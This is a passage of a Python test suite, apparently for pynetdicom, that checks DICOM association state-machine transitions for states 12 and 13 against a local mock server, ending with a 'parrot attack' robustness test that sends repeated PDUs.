'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt13'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt14(self):
"""Test Sta12 + Evt14."""
# Sta12 + Evt14 -> AR-4 -> Sta12
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
# AR-4: Issue A-RELEASE-RP PDU and start ARTIM
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('recv', None), # recv a-release-rp
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:7] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
('Sta12', 'Evt14', 'AR-4'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt14'
]
assert scp.handlers[0].received[2] == (
b'\x06\x00\x00\x00\x00\x04\x00\x00\x00\x00'
)
def test_evt15(self):
"""Test Sta12 + Evt15."""
# Sta12 + Evt15 -> AA-1 -> Sta13
# Evt15: Receive A-ABORT (rq) primitive from <local user>
# AA-1: Send A-ABORT PDU to <remote>, start ARTIM
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('recv', None) # recv a-abort
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
assoc.dul.send_pdu(self.get_abort())
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:7] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
('Sta12', 'Evt15', 'AA-1'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt15'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x00\x00'
)
def test_evt16(self):
"""Test Sta12 + Evt16."""
# Sta12 + Evt16 -> AA-3 -> Sta1
# Evt16: Receive A-ABORT PDU from <remote>
# AA-3: Issue A-ABORT or A-P-ABORT primitive, close connection
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('send', a_abort), # trigger event
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:7] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
('Sta12', 'Evt16', 'AA-3'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt16'
]
def test_evt17(self):
"""Test Sta12 + Evt17."""
# Sta12 + Evt17 -> AA-4 -> Sta1
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
# AA-4: Issue A-P-ABORT primitive
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:7] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
('Sta12', 'Evt17', 'AA-4'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt17'
]
def test_evt18(self):
"""Test Sta12 + Evt18."""
# Sta12 + Evt18 -> <ignore> -> Sta12
# Evt18: ARTIM timer expired from <local service>
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('wait', 0.2)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
assoc.dul.artim_timer.timeout = 0.05
assoc.dul.artim_timer.start()
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:7] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt18'
]
def test_evt19(self):
"""Test Sta12 + Evt19."""
# Sta12 + Evt19 -> AA-8 -> Sta13
# Evt19: Received unrecognised or invalid PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('send', b'\x08\x00\x00\x00\x00\x00\x00\x00'), # trigger event
('recv', None) # recv a-abort
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:7] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
('Sta12', 'Evt19', 'AA-8'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt19'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
class TestState13(TestStateBase):
"""Tests for State 13: Waiting for connection closed."""
def test_evt01(self):
"""Test Sta13 + Evt1."""
# Sta13 + Evt1 -> <ignore> -> Sta13
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_rq),
('wait', 0.1),
]
scp = self.start_server(commands)
def patch_neg_rq():
"""Override ACSE._negotiate_as_requestor"""
self.assoc.acse.send_request()
self.assoc.acse._negotiate_as_requestor = patch_neg_rq
orig_method = self.assoc.dul._is_transport_event
def patch_xport_event():
"""Override DUL._is_transport_event to not close in Sta13."""
if self.fsm.current_state == 'Sta13':
return False
return orig_method()
self.assoc.dul._is_transport_event = patch_xport_event
self.assoc.start()
while self.fsm.current_state != 'Sta13':
time.sleep(0.05)
self.assoc.dul.send_pdu(self.get_associate('request'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt6', 'AA-8'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt6', 'Evt1']
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta13 + Evt2."""
# Sta13 + Evt2 -> <ignore> -> Sta13
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta13 + Evt3."""
# Sta13 + Evt3 -> AA-6 -> Sta13
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
# AA-6: Ignore PDU
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_associate_ac),
('send', a_associate_ac),
('wait', 0.1),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt3', 'AA-8'),
('Sta13', 'Evt3', 'AA-6'),
]
assert self.fsm._transitions[:4] == [
'Sta4', 'Sta5', 'Sta6', 'Sta13'
]
assert self.fsm._events[:5] == [
'Evt1', 'Evt2', 'Evt3', 'Evt3', 'Evt3'
]
def test_evt04(self):
"""Test Sta13 + Evt4."""
# Sta13 + Evt4 -> AA-6 -> Sta13
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
# AA-6: Ignore PDU
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_associate_ac),
('send', a_associate_rj),
('wait', 0.1),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt3', 'AA-8'),
('Sta13', 'Evt4', 'AA-6'),
]
assert self.fsm._transitions[:4] == [
'Sta4', 'Sta5', 'Sta6', 'Sta13'
]
assert self.fsm._events[:5] == [
'Evt1', 'Evt2', 'Evt3', 'Evt3', 'Evt4'
]
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta13 + Evt5."""
# Sta13 + Evt5 -> <ignore> -> Sta13
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
pass
def test_evt06(self):
"""Test Sta13 + Evt6."""
# Sta13 + Evt6 -> AA-7 -> Sta13
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
# AA-7: Send A-ABORT PDU to <remote>
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_associate_ac),
('send', a_associate_rq),
('wait', 0.1),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt3', 'AA-8'),
('Sta13', 'Evt6', 'AA-7'),
]
assert self.fsm._transitions[:4] == [
'Sta4', 'Sta5', 'Sta6', 'Sta13'
]
assert self.fsm._events[:5] == [
'Evt1', 'Evt2', 'Evt3', 'Evt3', 'Evt6'
]
def test_evt07(self):
"""Test Sta13 + Evt7."""
# Sta13 + Evt7 -> <ignore> -> Sta13
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_rq),
('wait', 0.1),
]
scp = self.start_server(commands)
def patch_neg_rq():
"""Override ACSE._negotiate_as_requestor"""
self.assoc.acse.send_request()
self.assoc.acse._negotiate_as_requestor = patch_neg_rq
orig_method = self.assoc.dul._is_transport_event
def patch_xport_event():
"""Override DUL._is_transport_event to not close in Sta13."""
if self.fsm.current_state == 'Sta13':
return False
return orig_method()
self.assoc.dul._is_transport_event = patch_xport_event
self.assoc.start()
while self.fsm.current_state != 'Sta13':
time.sleep(0.05)
self.assoc.dul.send_pdu(self.get_associate('accept'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt6', 'AA-8'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt6', 'Evt7']
def test_evt08(self):
"""Test Sta13 + Evt8."""
# Sta13 + Evt8 -> <ignore> -> Sta13
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_rq),
('wait', 0.1),
]
scp = self.start_server(commands)
def patch_neg_rq():
"""Override ACSE._negotiate_as_requestor"""
self.assoc.acse.send_request()
self.assoc.acse._negotiate_as_requestor = patch_neg_rq
orig_method = self.assoc.dul._is_transport_event
def patch_xport_event():
"""Override DUL._is_transport_event to not close in Sta13."""
if self.fsm.current_state == 'Sta13':
return False
return orig_method()
self.assoc.dul._is_transport_event = patch_xport_event
self.assoc.start()
while self.fsm.current_state != 'Sta13':
time.sleep(0.05)
self.assoc.dul.send_pdu(self.get_associate('reject'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt6', 'AA-8'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt6', 'Evt8']
def test_evt09(self):
"""Test Sta13 + Evt9."""
# Sta13 + Evt9 -> <ignore> -> Sta13
# Evt9: Receive P-DATA primitive from <local user>
commands = [
('recv', None),
('send', a_associate_rq),
('wait', 0.2),
]
scp = self.start_server(commands)
def patch_neg_rq():
"""Override ACSE._negotiate_as_requestor"""
self.assoc.acse.send_request()
self.assoc.acse._negotiate_as_requestor = patch_neg_rq
orig_method = self.assoc.dul._is_transport_event
def patch_xport_event():
"""Override DUL._is_transport_event to not close in Sta13."""
if self.fsm.current_state == 'Sta13':
return False
return orig_method()
self.assoc.dul._is_transport_event = patch_xport_event
self.assoc.start()
while self.fsm.current_state != 'Sta13':
time.sleep(0.05)
self.assoc.dul.send_pdu(self.get_pdata())
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt6', 'AA-8'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt6', 'Evt9']
def test_evt10(self):
"""Test Sta13 + Evt10."""
# Sta13 + Evt10 -> AA-6 -> Sta13
# Evt10: Receive P-DATA-TF PDU from <remote>
# AA-6: Ignore PDU
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_associate_ac),
('send', p_data_tf),
('wait', 0.1),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt3', 'AA-8'),
('Sta13', 'Evt10', 'AA-6'),
]
assert self.fsm._transitions[:4] == [
'Sta4', 'Sta5', 'Sta6', 'Sta13'
]
assert self.fsm._events[:5] == [
'Evt1', 'Evt2', 'Evt3', 'Evt3', 'Evt10'
]
def test_evt11(self):
"""Test Sta13 + Evt11."""
# Sta13 + Evt11 -> <ignore> -> Sta13
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_rq),
('wait', 0.1),
]
scp = self.start_server(commands)
def patch_neg_rq():
"""Override ACSE._negotiate_as_requestor"""
self.assoc.acse.send_request()
self.assoc.acse._negotiate_as_requestor = patch_neg_rq
orig_method = self.assoc.dul._is_transport_event
def patch_xport_event():
"""Override DUL._is_transport_event to not close in Sta13."""
if self.fsm.current_state == 'Sta13':
return False
return orig_method()
self.assoc.dul._is_transport_event = patch_xport_event
self.assoc.start()
while self.fsm.current_state != 'Sta13':
time.sleep(0.05)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt6', 'AA-8'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt6', 'Evt11']
def test_evt12(self):
"""Test Sta13 + Evt12."""
# Sta13 + Evt12 -> AA-6 -> Sta13
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
# AA-6: Ignore PDU
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_associate_ac),
('send', a_release_rq),
('wait', 0.1),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt3', 'AA-8'),
('Sta13', 'Evt12', 'AA-6'),
]
assert self.fsm._transitions[:4] == [
'Sta4', 'Sta5', 'Sta6', 'Sta13'
]
assert self.fsm._events[:5] == [
'Evt1', 'Evt2', 'Evt3', 'Evt3', 'Evt12'
]
def test_evt13(self):
"""Test Sta13 + Evt13."""
# Sta13 + Evt13 -> AA-6 -> Sta1
# Evt13: Receive A-RELEASE-RP PDU from <remote>
# AA-6: Ignore PDU
commands = [
('recv', None), # recv a-associate-rq
('send', a_associate_ac),
('wait', 0.1),
('send', a_associate_ac),
('send', a_release_rp),
('wait', 0.1),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt3', 'AA-8'),
('Sta13', 'Evt13', 'AA-6'),
]
assert self.fsm._transitions[:4] == [
'Sta4', 'Sta5', 'Sta6', 'Sta13'
]
assert self.fsm._events[:5] == [
'Evt1', 'Evt2', 'Evt3', 'Evt3', 'Evt13'
]
def test_evt14(self):
"""Test Sta13 + Evt14."""
# Sta13 + Evt14 -> <ignore> -> Sta13
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_rq),
('wait', 0.1),
]
scp = self.start_server(commands)
def patch_neg_rq():
"""Override ACSE._negotiate_as_requestor"""
self.assoc.acse.send_request()
self.assoc.acse._negotiate_as_requestor = patch_neg_rq
orig_method = self.assoc.dul._is_transport_event
def patch_xport_event():
"""Override DUL._is_transport_event to not close in Sta13."""
if self.fsm.current_state == 'Sta13':
return False
return orig_method()
self.assoc.dul._is_transport_event = patch_xport_event
self.assoc.start()
while self.fsm.current_state != 'Sta13':
time.sleep(0.05)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt6', 'AA-8'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt6', 'Evt14']
def test_evt15(self):
"""Test Sta13 + Evt15."""
# Sta13 + Evt15 -> <ignore> -> Sta13
# Evt15: Receive A-ABORT (rq) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_rq),
('wait', 0.1),
]
scp = self.start_server(commands)
def patch_neg_rq():
"""Override ACSE._negotiate_as_requestor"""
self.assoc.acse.send_request()
self.assoc.acse._negotiate_as_requestor = patch_neg_rq
orig_method = self.assoc.dul._is_transport_event
def patch_xport_event():
"""Override DUL._is_transport_event to not close in Sta13."""
if self.fsm.current_state == 'Sta13':
return False
return orig_method()
self.assoc.dul._is_transport_event = patch_xport_event
self.assoc.start()
while self.fsm.current_state != 'Sta13':
time.sleep(0.05)
self.assoc.dul.send_pdu(self.get_abort())
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt6', 'AA-8'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt6', 'Evt15']
def test_evt16(self):
"""Test Sta13 + Evt16."""
# Sta13 + Evt16 -> AA-2 -> Sta1
# Evt16: Receive A-ABORT PDU from <remote>
# AA-2: Stop ARTIM, close connection
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_associate_ac),
('send', a_abort),
('wait', 0.1),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt3', 'AA-8'),
('Sta13', 'Evt16', 'AA-2'),
]
assert self.fsm._transitions[:4] == [
'Sta4', 'Sta5', 'Sta6', 'Sta13'
]
assert self.fsm._events[:5] == [
'Evt1', 'Evt2', 'Evt3', 'Evt3', 'Evt16'
]
def test_evt17(self):
"""Test Sta13 + Evt17."""
# Sta13 + Evt17 -> AR-5 -> Sta1
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
# AR-5: Stop ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_associate_ac),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt3', 'AA-8'),
('Sta13', 'Evt17', 'AR-5'),
]
assert self.fsm._transitions[:4] == [
'Sta4', 'Sta5', 'Sta6', 'Sta13'
]
assert self.fsm._events[:5] == [
'Evt1', 'Evt2', 'Evt3', 'Evt3', 'Evt17'
]
def test_evt18(self):
"""Test Sta13 + Evt18."""
# Sta13 + Evt18 -> AA-2 -> Sta1
# Evt18: ARTIM timer expired from <local service>
# AA-2: Stop ARTIM, close connection
commands = [
('recv', None),
('send', a_associate_rq),
('wait', 0.1),
]
scp = self.start_server(commands)
def patch_neg_rq():
"""Override ACSE._negotiate_as_requestor"""
self.assoc.acse.send_request()
self.assoc.acse._negotiate_as_requestor = patch_neg_rq
orig_method = self.assoc.dul._is_transport_event
def patch_xport_event():
"""Override DUL._is_transport_event to not close in Sta13."""
if self.fsm.current_state == 'Sta13':
return False
return orig_method()
self.assoc.dul._is_transport_event = patch_xport_event
self.assoc.start()
while self.fsm.current_state != 'Sta13':
time.sleep(0.05)
self.assoc.dul.artim_timer.timeout = 0.05
self.assoc.dul.artim_timer.start()
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt6', 'AA-8'),
('Sta13', 'Evt18', 'AA-2'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta13', 'Sta1']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt6', 'Evt18']
def test_evt19(self):
"""Test Sta13 + Evt19."""
# Sta13 + Evt19 -> AA-7 -> Sta13
# Evt19: Received unrecognised or invalid PDU from <remote>
# AA-7: Send A-ABORT PDU to <remote>
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_associate_ac),
('send', b'\x08\x00\x00\x00\x00\x00\x00\x00'),
('wait', 0.1),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt3', 'AA-8'),
('Sta13', 'Evt19', 'AA-7'),
]
assert self.fsm._transitions[:4] == [
'Sta4', 'Sta5', 'Sta6', 'Sta13'
]
assert self.fsm._events[:5] == [
'Evt1', 'Evt2', 'Evt3', 'Evt3', 'Evt19'
]
class TestParrotAttack(TestStateBase):
"""Test a parrot attack on the association."""
def test_requestor(self):
commands = [
('recv', None),
('send', a_associate_ac),
('send', p_data_tf),
('send', p_data_tf),
('send', p_data_tf),
('send', p_data_tf),
('send', p_data_tf),
('send', p_data_tf),
('send', p_data_tf),
('send', p_data_tf),
('send', a_release_rq),
('wait', 0.1)
]
scp = self.start_server(commands)
self.assoc.start()
time.sleep(0.5)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:14] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt12', 'AR-2'),
('Sta8', 'Evt14', 'AR-4'),
('Sta13', 'Evt17', 'AR-5'),
]
def test_acceptor(self):
"""Test hitting the acceptor with PDUs."""
# Also a regression test for #120
# C-ECHO-RQ
# 80 total length
echo_rq = (
b"\x04\x00\x00\x00\x00\x4a" # P-DATA-TF 74
b"\x00\x00\x00\x46\x01" # PDV Item 70
b"\x03" # PDV: 2 -> 69
b"\x00\x00\x00\x00\x04\x00\x00\x00\x42\x00\x00\x00" # 12 Command Group Length
b"\x00\x00\x02\x00\x12\x00\x00\x00\x31\x2e\x32\x2e\x38"
b"\x34\x30\x2e\x31\x30\x30\x30\x38\x2e\x31\x2e\x31\x00" # 26
b"\x00\x00\x00\x01\x02\x00\x00\x00\x30\x00" # 10 Command Field
b"\x00\x00\x10\x01\x02\x00\x00\x00\x01\x00" # 10 Message ID
b"\x00\x00\x00\x08\x02\x00\x00\x00\x01\x01" # 10 Command Data Set Type
)
# Send associate request then c-echo requests then release request
commands = [
('send', a_associate_rq),
('recv', None),
('send', echo_rq),
('recv', None),
('send', echo_rq),
('recv', None),
('send', echo_rq),
('recv', None),
('send', echo_rq),
('recv', None),
('send', echo_rq),
('recv', None),
('send', echo_rq),
('recv', None),
('send', echo_rq),
('recv', None),
('send', echo_rq),
('recv', None),
